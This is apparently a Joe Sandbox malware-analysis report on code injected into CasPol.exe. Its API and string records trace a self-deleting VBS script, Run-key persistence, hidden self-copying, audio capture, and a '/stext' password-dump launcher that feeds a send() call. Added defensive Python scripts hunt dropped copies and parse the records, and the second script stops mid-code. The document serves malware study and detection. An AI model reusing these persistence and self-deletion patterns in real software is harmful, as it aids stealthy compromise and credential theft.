                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
                                                                                                            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
                                                                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
                                                                                                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                              • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                              • Part of subcall function 0041B58F: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
                                                                                                            • ExitProcess.KERNEL32 ref: 0040C63E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                            • String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                                            • API String ID: 1861856835-3168347843
                                                                                                            • Opcode ID: 30a7f1232d58b3c75cebc1c3b5ae0731fe694418f196ddfec79bbb146588a510
                                                                                                            • Instruction ID: c8b5e11b4abf5c95f8ab28b2bb359051ef64700817c412cd349ec45860bdb676
                                                                                                            • Opcode Fuzzy Hash: 30a7f1232d58b3c75cebc1c3b5ae0731fe694418f196ddfec79bbb146588a510
                                                                                                            • Instruction Fuzzy Hash: EB9175316042005AC314FB25D852ABF7799AF91718F10453FF98A631E2EF7CAD49C69E
                                                                                                            APIs
                                                                                                              • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                              • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                                                                            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                                                                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                              • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                              • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                                                                            • ExitProcess.KERNEL32 ref: 0040C287
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                            • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                                                            • API String ID: 3797177996-1998216422
                                                                                                            • Opcode ID: f8db6c80a5998e80f5fcda658f3bc18fad5a3966bea32a5fb824f2fdbbebcd5a
                                                                                                            • Instruction ID: 1063ce1f4075510d90626cdc8b34ac690c3cf2dc76fa2c9c3337a4c1feab76e8
                                                                                                            • Opcode Fuzzy Hash: f8db6c80a5998e80f5fcda658f3bc18fad5a3966bea32a5fb824f2fdbbebcd5a
                                                                                                            • Instruction Fuzzy Hash: B78191316042005BC315FB21D862ABF77A9ABD1308F10453FF586A71E2EF7CAD49869E
                                                                                                            APIs
                                                                                                            • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
                                                                                                            • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
                                                                                                            • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A2FF
                                                                                                            • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A340
                                                                                                            • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A358
                                                                                                            • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A36D
                                                                                                            • SetEvent.KERNEL32 ref: 0041A38A
                                                                                                            • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
                                                                                                            • CloseHandle.KERNEL32 ref: 0041A3AB
                                                                                                            • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3CD
                                                                                                            • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3D7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                            • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                                                                            • API String ID: 738084811-1408154895
                                                                                                            • Opcode ID: 488289ec40dba372481858aeedb64a88910d805c9ae5a4b7c21143b04d603b6e
                                                                                                            • Instruction ID: 9d48d6c6e0579c1e833a8367b0d02802659df9f73890df0c3e8ff2b6504ede8e
                                                                                                            • Opcode Fuzzy Hash: 488289ec40dba372481858aeedb64a88910d805c9ae5a4b7c21143b04d603b6e
                                                                                                            • Instruction Fuzzy Hash: 9A51C2712443056AD214BB31DC82EBF3B5CEB91758F10043FF455A21E2EE389D9986AF
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                            • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                                                                            • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                                                                            • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                                                                            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                                                                            • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                                                                            • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                                                                            • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                                                                            • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                                                                            • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                                                                            • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                                                                            • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                                                                            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$Write$Create
                                                                                                            • String ID: RIFF$WAVE$data$fmt
                                                                                                            • API String ID: 1602526932-4212202414
                                                                                                            • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                            • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                                                                            • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                            • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000001,004068B2,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
• GetProcAddress.KERNEL32(00000000), ref: 00406511
• GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
• GetProcAddress.KERNEL32(00000000), ref: 00406525
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
• GetProcAddress.KERNEL32(00000000), ref: 00406539
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
• GetProcAddress.KERNEL32(00000000), ref: 0040654D
• GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
• GetProcAddress.KERNEL32(00000000), ref: 00406561
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
• API String ID: 1646373207-165202446
• Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
• Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
• Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
• Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
APIs
• _wcslen.LIBCMT ref: 0040BC75
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
• CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
• _wcslen.LIBCMT ref: 0040BD54
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
• CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000), ref: 0040BDF2
• SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
• _wcslen.LIBCMT ref: 0040BE34
• SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
• ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
• ExitProcess.KERNEL32 ref: 0040BED0
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
• String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$del$open$BG$BG
• API String ID: 1579085052-1280438975
• Opcode ID: 5810891c7d77c7b93cc386c5bda24951b24e135575458cac5ec9797dffa7e349
• Instruction ID: b3868b96a5a73c1b880f625a38b4c220dd420420d05b0a2cc1e840e3cd02b35d
• Opcode Fuzzy Hash: 5810891c7d77c7b93cc386c5bda24951b24e135575458cac5ec9797dffa7e349
• Instruction Fuzzy Hash: D251B0212043406BD609B722EC52EBF77999F81719F10443FF985A66E2DF3CAD4582EE
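The record above is the install routine: create a directory, copy the running image to it, set attribute mask 0x7 on the copy, relaunch it with ShellExecuteW("open"), and ExitProcess. Two details matter for triage. First, 0x7 is FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM, so the dropped file is invisible to a default Explorer view and to `dir` without `/a`. Second, the CopyFileW source is `C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe`, the image of the process the payload was injected into (dump 18 is CasPol.exe), so what lands on disk is a copy of the legitimate .NET binary carrying malware attributes, not the payload itself. The script below is an added example, not code from the report or the sample: it decodes the attribute mask and hunts a file listing for CasPol.exe copies outside its stock locations with HIDDEN and SYSTEM set. The listing, the `LEGIT_DIRS` allowlist and the dropped-file path are constructed for the example.

```python
"""
Added example, not code from the Joe Sandbox report or from the sample: decode
the attribute mask the install routine above passes to SetFileAttributesW and
hunt a file listing for copies of the host image (CasPol.exe) dropped with
those attributes outside its legitimate .NET Framework directories.
"""
import ntpath
from dataclasses import dataclass

# FILE_ATTRIBUTE_* bits from winnt.h; 0x7 is the value seen in the calls above.
FILE_ATTRIBUTES = {
    0x01: "READONLY",
    0x02: "HIDDEN",
    0x04: "SYSTEM",
    0x10: "DIRECTORY",
    0x20: "ARCHIVE",
    0x80: "NORMAL",
}
HIDDEN_SYSTEM = 0x02 | 0x04


def decode_attributes(mask: int) -> list:
    """Return the FILE_ATTRIBUTE_* names set in `mask`, lowest bit first."""
    return [name for bit, name in sorted(FILE_ATTRIBUTES.items()) if mask & bit]


# CopyFileW source seen in the record above: the injected host's own image.
HOST_IMAGE = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

# Directories where CasPol.exe legitimately lives (assumption: stock .NET install).
LEGIT_DIRS = {
    r"c:\windows\microsoft.net\framework\v4.0.30319",
    r"c:\windows\microsoft.net\framework64\v4.0.30319",
    r"c:\windows\microsoft.net\framework\v2.0.50727",
    r"c:\windows\microsoft.net\framework64\v2.0.50727",
}


@dataclass
class FileRecord:
    path: str
    attributes: int  # raw Win32 attribute mask, e.g. from an MFT export


def is_suspect_copy(rec: FileRecord, host_image: str = HOST_IMAGE) -> bool:
    """Same file name as the host image, outside its legitimate directories,
    and carrying both HIDDEN and SYSTEM, as the install routine above sets."""
    if ntpath.basename(rec.path).lower() != ntpath.basename(host_image).lower():
        return False
    if ntpath.dirname(rec.path).lower() in LEGIT_DIRS:
        return False
    return (rec.attributes & HIDDEN_SYSTEM) == HIDDEN_SYSTEM


def hunt(records) -> list:
    """Paths in `records` that look like the dropped copy."""
    return [r.path for r in records if is_suspect_copy(r)]


# Constructed listing (not from the report): two legitimate copies, one dropped
# copy with READONLY|HIDDEN|SYSTEM, and a decoy with the name but plain attributes.
SAMPLE_LISTING = [
    FileRecord(HOST_IMAGE, 0x20),
    FileRecord(r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe", 0x20),
    FileRecord(r"C:\Users\user\AppData\Roaming\Updater\CasPol.exe", 0x07),
    FileRecord(r"C:\Users\user\Downloads\CasPol.exe", 0x20),
]

if __name__ == "__main__":
    print("SetFileAttributesW mask 0x7 =", "|".join(decode_attributes(0x7)))
    for path in hunt(SAMPLE_LISTING):
        print("suspect copy:", path)
```

The allowlist is matched on the parent directory rather than the full path so that the 64-bit and v2.0 copies of CasPol.exe do not raise alerts; a copy that has only HIDDEN or only SYSTEM is deliberately not flagged, since the routine above sets both.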
APIs
• lstrlenW.KERNEL32(?), ref: 0041B1D6
• _memcmp.LIBVCRUNTIME ref: 0041B1EE
• lstrlenW.KERNEL32(?), ref: 0041B207
• FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
• GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B255
• QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
• lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
• FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
• _wcslen.LIBCMT ref: 0041B2DB
• FindVolumeClose.KERNEL32(?), ref: 0041B2FB
• GetLastError.KERNEL32 ref: 0041B313
• GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
• lstrcatW.KERNEL32(?,?), ref: 0041B359
• lstrcpyW.KERNEL32(?,?), ref: 0041B368
• GetLastError.KERNEL32 ref: 0041B370
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
• String ID: ?
• API String ID: 3941738427-1684325040
• Opcode ID: 17f0383a2199e65fad79c02efdfd6f833a281a6f5bd6be27e9a359bd3f4b92bf
• Instruction ID: 2e0df54dd889987763cd5022c3700ac4418931210c184d5857636408485aa128
• Opcode Fuzzy Hash: 17f0383a2199e65fad79c02efdfd6f833a281a6f5bd6be27e9a359bd3f4b92bf
• Instruction Fuzzy Hash: 8B416F71508305AAD7209FA1EC8C9EBB7E8EB49715F00096BF541C2261EB78C98887D6
APIs
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: _free$EnvironmentVariable$_wcschr
• String ID:
• API String ID: 3899193279-0
• Opcode ID: 51f39d1eed0bb0b4e5b8ce655fdeab7d9d24a3419ebedca0ef41db0feeddc4a5
• Instruction ID: 8ac3cd9939a067627e1c481289c57a7f9f94b657261427fab31af25724b0c78e
• Opcode Fuzzy Hash: 51f39d1eed0bb0b4e5b8ce655fdeab7d9d24a3419ebedca0ef41db0feeddc4a5
• Instruction Fuzzy Hash: 96D13C719007007FFB25AF7B9881A6F7BA4BF02314F0541AFF905A7381E63989418B9D
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
  • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
  • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
  • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
• Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
• Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
• Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
• DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
• DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
• DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
• Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
• Sleep.KERNEL32(00000064), ref: 00412060
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
• String ID: /stext "$HDG$HDG$>G$>G
• API String ID: 1223786279-3931108886
• Opcode ID: 951e407a7335b9e0a56f91841e3e4d0ffd1770d323d9a5522bd6a3f544b0dece
• Instruction ID: 1febf249a593eb43810efab42e14b6693ac358e03ba90545e56d33427da79e18
• Opcode Fuzzy Hash: 951e407a7335b9e0a56f91841e3e4d0ffd1770d323d9a5522bd6a3f544b0dece
• Instruction Fuzzy Hash: 960243315083414AC325FB61D891AEFB7D5AFD4308F50493FF88A931E2EF785A49C69A
APIs
• GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
• LoadLibraryA.KERNEL32(?), ref: 00413EC8
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
• FreeLibrary.KERNEL32(00000000), ref: 00413EEF
• LoadLibraryA.KERNEL32(?), ref: 00413F27
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
• FreeLibrary.KERNEL32(00000000), ref: 00413F40
• GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
• FreeLibrary.KERNEL32(00000000), ref: 00413F66
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: Library$AddressFreeProc$Load$DirectorySystem
• String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
• API String ID: 2490988753-744132762
• Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
• Instruction ID: a4547f3d416e9253f7b1cbdd0907a67efdadb69b2b53743d1710677937ed8fa2
• Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
• Instruction Fuzzy Hash: 6D31C4B1906315A7D320AF25DC44ACBB7ECEF44745F400A2AF844D3201D778DA858AEE
APIs
• RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B846
• RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B88A
• RegCloseKey.ADVAPI32(?), ref: 0041BB54
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: CloseEnumOpen
• String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
• API String ID: 1332880857-3714951968
• Opcode ID: 6f9d8f0674dc0a37181ba86e51d6a92751e66a7c9b2afbb440473ff198e35625
• Instruction ID: 4ca6cd9db44c7b11bab16217f2b7ba144dfc64e74838f3250c32f9e768a6938f
• Opcode Fuzzy Hash: 6f9d8f0674dc0a37181ba86e51d6a92751e66a7c9b2afbb440473ff198e35625
• Instruction Fuzzy Hash: 8C812E311082449BD324EB11DC51AEFB7E9FFD4314F10493FB58A921E1EF74AA49CA9A
APIs
• DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAE9
• GetCursorPos.USER32(?), ref: 0041CAF8
• SetForegroundWindow.USER32(?), ref: 0041CB01
• TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
• Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB6C
• ExitProcess.KERNEL32 ref: 0041CB74
• CreatePopupMenu.USER32 ref: 0041CB7A
• AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB8F
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
• String ID: Close
• API String ID: 1657328048-3535843008
• Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
• Instruction ID: a66ed96c0d91d71762f770de87d5f41dd37c70c4e97b210e23d221b2b7ccacbc
• Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
• Instruction Fuzzy Hash: 68212B71188209FFDB064F64FD4EAAA3F65EB04342F044135B906D40B2D7B9EA90EB18
APIs
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: _free$Info
• String ID:
• API String ID: 2509303402-0
• Opcode ID: 9077060aec37fc2a24c06225c8e3d33544530eed784cb91a0a423b34aeaed2a1
• Instruction ID: 0af7f9009007d8880989bd470fdb3e4a62bb8e65dbd2af1b74ff5c8893cb1db7
• Opcode Fuzzy Hash: 9077060aec37fc2a24c06225c8e3d33544530eed784cb91a0a423b34aeaed2a1
• Instruction Fuzzy Hash: D0B18F71900605AFEF11DFA9C881BEEBBF4BF49304F14406EF855B7242DA79A8458B64
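Read together, the records above from dump 18 (the CasPol.exe host) describe distinct stages of the implant: export names for NtAllocateVirtualMemory, NtFreeVirtualMemory, RtlAcquirePebLock/RtlReleasePebLock and LdrEnumerateLoadedModules resolved at run time through GetModuleHandleW/GetProcAddress (the plugin attaches the string constant it sees pushed near each call, which is why the export names appear as GetModuleHandleW arguments); the self-copy install routine; a launcher whose only literal is `/stext "` (the save-as-text switch of NirSoft's password-recovery utilities, which the report itself does not name) followed by Sleep, three DeleteFileW calls and a send() in a subcall; and enumeration of `HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall` for DisplayName, Publisher and UninstallString. The script below is an added example, not Joe Sandbox or Remcos code: it parses the per-function `• Name.MODULE(args), ref: ADDR` and `• String ID:` lines in the form the report prints them and applies a small rule set that maps API and string clusters to those behaviours. The rule names and their required sets are the editor's own; the sample input is copied from the records above, trimmed to the calls the rules need.

```python
"""
Added example, not part of the Joe Sandbox report: a parser for the report's
per-function "APIs" / "String ID" records, plus a rule set (the editor's own)
that maps API and string clusters seen in the records above to behaviours.
"""
import re
from dataclasses import dataclass, field

# "• Name.MODULE(args), ref: ADDR"  or  "• Name.MODULE ref: ADDR",
# optionally prefixed with "Part of subcall function XXXXXXXX:".
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# "• String ID: a$b$c" (strings are '$'-separated in the report)
STRINGS_RE = re.compile(r"^\s*•\s*String ID:\s*(?P<s>.*)$")


@dataclass
class Record:
    calls: list = field(default_factory=list)  # (api, module, [args], ref, subcall_of)
    strings: set = field(default_factory=set)  # String ID tokens plus every call argument

    @property
    def apis(self):
        return {c[0] for c in self.calls}


def parse_records(text):
    """Split on the 'APIs' header lines and collect calls/strings per function."""
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = Record()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = CALL_RE.match(line)
        if m:
            args = [a for a in (m["args"] or "").split(",") if a]
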